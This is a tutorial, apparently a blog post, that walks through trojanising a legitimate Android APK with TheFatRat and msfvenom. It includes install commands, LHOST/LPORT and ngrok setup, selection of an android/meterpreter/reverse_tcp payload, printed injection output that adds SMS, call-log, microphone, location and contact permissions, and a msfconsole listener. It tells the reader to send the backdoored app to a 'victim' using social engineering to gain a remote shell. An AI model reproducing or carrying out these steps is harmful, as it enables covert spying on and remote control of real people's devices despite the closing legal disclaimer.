Table of Contents
In this guide we will be embedding a payload on apk installer file which is legitimate. With over 2.5 billion users and 3 million devices worldwide, android is the most common operating system among users’ devices (mobile phones and tablets). This has made it a number one target for hackers committing cyber crimes around the world. Numerous viruses and Trojans have been discovered by cyber security specialists lately. Many of the criminals targeted the android devices for the purpose of stealing data, spying activities on persons of interest, creating botnet to attack systems among other reasons.
In this guide I will be guiding you on how to embed a payload on apk file using FatRat.
What is FatRat
FatRat is a massive exploitation tool which is used to compile malwares with famous payloads which are executed in Mac, Windows Android and Linux environments. It automates the process of embedding payload on apk files meant for android devices. It also equips backdoors and payloads with antivirus evading capabilities hence they are able to get into a user devices without raising alarm. Some advantages of using FatRat include;
- It automates the process of embedding a payload on apk file.
- It supports many types of backdoors and payloads on different OS platforms.
- It is open source.
- Have Kali Linux Operating system installed.
- Have FatRat framework installed on your Kali Linux.
- Have ngrok installed and configured.
What we expect from you
- Knowledge of using a terminal.
- Have an original app which is to be backdoored. You can download one from https://m.apkpure.com/
- Have metasploit installed.
With that information in mind. Lets jump right into our tutorial.
Steps to install FatRat
Step 1: Cloning FatRat from Github
We use the below command to clone it from its GitHub repository.
git clone https://github.com/Screetsec/TheFatRat.git
Step 2: Navigate to its directory
In this step we navigate to FatRat directory in order to continue with our installation.
Step 3: Installing FatRat
This is the final step. We give the setup.sh the necessary permissions to install and we start the installation process.
chmod +x setup.sh && ./setup.sh
Steps to embed a payload on apk installer file
Step 1: Starting the FatRat
In the fist step of this guide we start our framework which will help us to generate and embed the payload on apk file. We start a new terminal and use command
┌──(toxic㉿kali)-[~] └─$ sudo fatrat
on the opened terminal to run the framework. Make sure to run the framework as root.
Step 2: Selecting the operation we want to perform
At first it may take time to run as it must install other dependencies required for it to work as required. Make sure you have a strong internet connection to avoid it taking a lot of time. Now we have a screen where we have to choose the kind of backdoor we want to generate. and we choose option 5 which is “Backdooring original apk”
Step 3: Setting LHOST and LPORT
In this step we have to set our local port and IP address. If you are using Ngrok you will use the IP address from Ngrok. If the target device is in the same LAN as you, you will use your local IP address. In our case we are attacking a device which is in the same LAN we will be using our local host IP address. We can set our LPORT to 4444 or any other port.
Step 4: Enter path to our original apk
In this step we will be required to enter path to our original apk. We will provide path to where we downloaded the apk to be embedded with the payload as shown below and enter to continue to the next step.
Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
Path : /yourpath/originalapp.apk
Step 5: Choosing payload
Having set the path to our apk file, the FatRat will test if our app is compatible and take us to the next step of the backdoor development. In our case we will choose android/meterpreter/reverse_tcp . This type of a payload will try creating a connection back to the LHOST provided via the LPORT we provided once the user installs the app.
Step 6: Selecting tool to create the payload.
We are required to select the tool to be used to create the payload. We will be using the MsfVenom in our case.
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ] +-------------------------------------+ | [ 1 ] Use Backdoor-apk 0.2.4a | | [ 2 ] Use old Fatrat method | | [ 3 ] Use MsfVenom Embedded method | +-------------------------------------+ Select Tool to create apk : 3
Step 7: Creating a listener to use with msfconsole
In this step we will be generating a listener which we will load to msfconsole to get a reverse shell once the user installs the backdoored application.
step 5: Choosing payload---------Backdooring your apk with MSFVenom----------- Using APK template: /home/toxic/TheFatRat/temp/app.apk [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload [*] Creating signing key and keystore.. [*] Decompiling original APK.. [*] Decompiling payload APK.. [*] Locating hook point.. [*] Adding payload as package tk.mugasystems.torchprohd.uczro [*] Loading /tmp/d20211101-6822-e9cmol/original/smali/tk/mugasystems/torchprohd/Welcomescreen.smali and injecting payload.. [*] Poisoning the manifest with meterpreter permissions.. [*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> [*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/> [*] Adding <uses-permission android:name="android.permission.SEND_SMS"/> [*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/> [*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/> [*] Adding <uses-permission android:name="android.permission.READ_SMS"/> [*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/> [*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> [*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/> [*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/> [*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/> [*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/> [*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/> [*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/> [*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/> [*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/> [*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/> [*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/> [*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/> [*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/> [*] Rebuilding apk with meterpreter injection as /tmp/d20211101-6822-e9cmol/output.apk [*] Signing /tmp/d20211101-6822-e9cmol/output.apk [*] Aligning /tmp/d20211101-6822-e9cmol/output.apk Payload size: 3405002 bytes Saved as: temp/backand.apk -----------------------Finished----------------------- Your backdoored apk can be found in : /root/Fatrat_Generated/app_backdoored.apk Do you want to create a listener for this configuration to use in msfconsole in future ? Choose y/n : y
Now everything has been generated and stored in their specific folders. Both the payload on apk and the listener to be used with msfconsole.
Step 8: Loading the listener to msfconsole and installing apk on target device
We now send our backdoored apk to the victim, we can apply some social engineering to make sure the user installs the apk. Make sure the listener has been loaded to msfconsole waiting for connection to the established.
To load listeners file to your msfconsole we use the following command.
msfconsole -r yourlistener.rc
When you load the .rc file you will get the below output
We just run to start listening and as shown below we have a shell we can access the device folders and also add or remove files from the device remotely.
In the above guide we were able to embed a backdoor to a legitimate app and installed it on an android device in order to gain a shell from where we can remotely issue commands to the backdoored android device. This process can be used to backdoor any legitimate app even those found on play-store hence we recommend you to avoid installing apps from third party sources. You can use the above guide to backdoor any app of your liking provided you remain within the cyber laws in your country.